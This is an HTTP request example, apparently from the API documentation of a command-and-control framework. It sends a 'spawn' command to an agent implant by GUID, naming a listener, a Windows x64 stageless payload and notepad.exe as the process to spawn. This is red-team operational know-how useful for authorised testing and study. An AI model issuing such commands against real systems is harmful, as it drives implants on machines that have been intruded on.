POST /api/v1/agents/{AGENT_GUID}/commands HTTP/1.1
Authorization: Bearer {JWT_TOKEN}
Content-Type: application/json
{
"template": "spawn",
"configuration": {
"listenerId": "1",
"payloadType": "WINDOWS_X64_STAGELESS",
"encryptedCommunication": true
},
"execConf": {
"execType": "NEW",
"executable": "C:\\Windows\\System32\\notepad.exe",
"suspended": false
}
}